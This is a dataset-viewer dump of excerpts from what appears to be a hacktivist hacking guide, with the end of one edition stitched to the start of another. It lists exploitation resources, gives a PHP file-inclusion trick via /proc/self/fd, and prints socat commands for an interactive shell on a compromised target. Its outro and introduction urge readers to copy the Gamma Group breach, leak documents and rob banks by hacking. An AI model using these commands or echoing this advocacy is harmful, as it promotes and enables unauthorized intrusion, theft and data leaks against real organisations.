text stringlengths 0 1.99k |
|---|
* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot |
* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash |
* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ |
* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers |
(all his other blog posts are great too) |
* https://www.corelan.be/ (start at Exploit writing tutorial part 1) |
* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ |
One trick it leaves out is that on most systems the apache access log is |
readable only by root, but you can still include from /proc/self/fd/10 or |
whatever fd apache opened it as. It would also be more useful if it mentioned |
what versions of php the various tricks were fixed in. |
* http://www.dest-unreach.org/socat/ |
Get usable reverse shells with a statically linked copy of socat to drop on |
your target and: |
target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM |
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM |
It's also useful for setting up weird pivots and all kinds of other stuff. |
Books: |
* The Web Application Hacker's Handbook |
* Hacking: The Art of Exploitation |
* The Database Hacker's Handbook |
* The Art of Software Security Assessment |
* A Bug Hunter's Diary |
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier |
* TCP/IP Illustrated |
Aside from the hacking specific stuff almost anything useful to a system |
administrator for setting up and administering networks will also be useful for |
exploring them. This includes familiarity with the windows command prompt and unix |
shell, basic scripting skills, knowledge of ldap, kerberos, active directory, |
networking, etc. |
--[ 10 ]-- Outro |
You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a |
tool. It's not selling hacking tools that makes Gamma evil. It's who their |
customers are targeting and with what purpose that makes them evil. That's not |
to say that tools are inherently neutral. Hacking is an offensive tool. In the |
same way that guerrilla warfare makes it harder to occupy a country, whenever |
it's cheaper to attack than to defend it's harder to maintain illegitimate |
authority and inequality. So I wrote this to try to make hacking easier and more |
accessible. And I wanted to show that the Gamma Group hack really was nothing |
fancy, just standard sqli, and that you do have the ability to go out and take |
similar action. |
Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea |
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned |
hackers, dissidents, and criminals! |
_ _ _ ____ _ _ |
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| | |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | |
| _ | (_| | (__| < | |_) | (_| | (__| <|_| |
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) |
A DIY Guide |
,-._,-._ |
_,-\ o O_/; |
/ , ` `| |
| \-.,___, / ` |
\ `-.__/ / ,.\ |
/ `-.__.-\` ./ \' |
/ /| ___\ ,/ `\ |
( ( |.-"` '/\ \ ` |
\ \/ ,, | \ _ |
\| o/o / \. |
\ , / / |
( __`;-;'__`) \\ |
`//'` `||` `\ |
_// || __ _ _ _____ __ |
.-"-._,(__) .(__).-""-. | | | | |_ _| | |
/ \ / \ | | |_| | | | | |
\ / \ / | | _ | | | | |
`'-------` `--------'` __| |_| |_| |_| |__ |
#antisec |
--[ 1 - Introduction ]---------------------------------------------------------- |
You'll notice the change in language since the last edition [1]. The |
English-speaking world already has tons of books, talks, guides, and |
info about hacking. In that world, there's plenty of hackers better than me, |
but they misuse their talents working for "defense" contractors, for intelligence |
agencies, to protect banks and corporations, and to defend the status quo. |
Hacker culture was born in the US as a counterculture, but that origin only |
remains in its aesthetics - the rest has been assimilated. At least they can |
wear a t-shirt, dye their hair blue, use their hacker names, and feel like |
rebels while they work for the Man. |
You used to have to sneak into offices to leak documents [2]. You used to need |
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4]. |
Like the CNT said after the Gamma Group hack: "Let's take a step forward with |
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight! |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.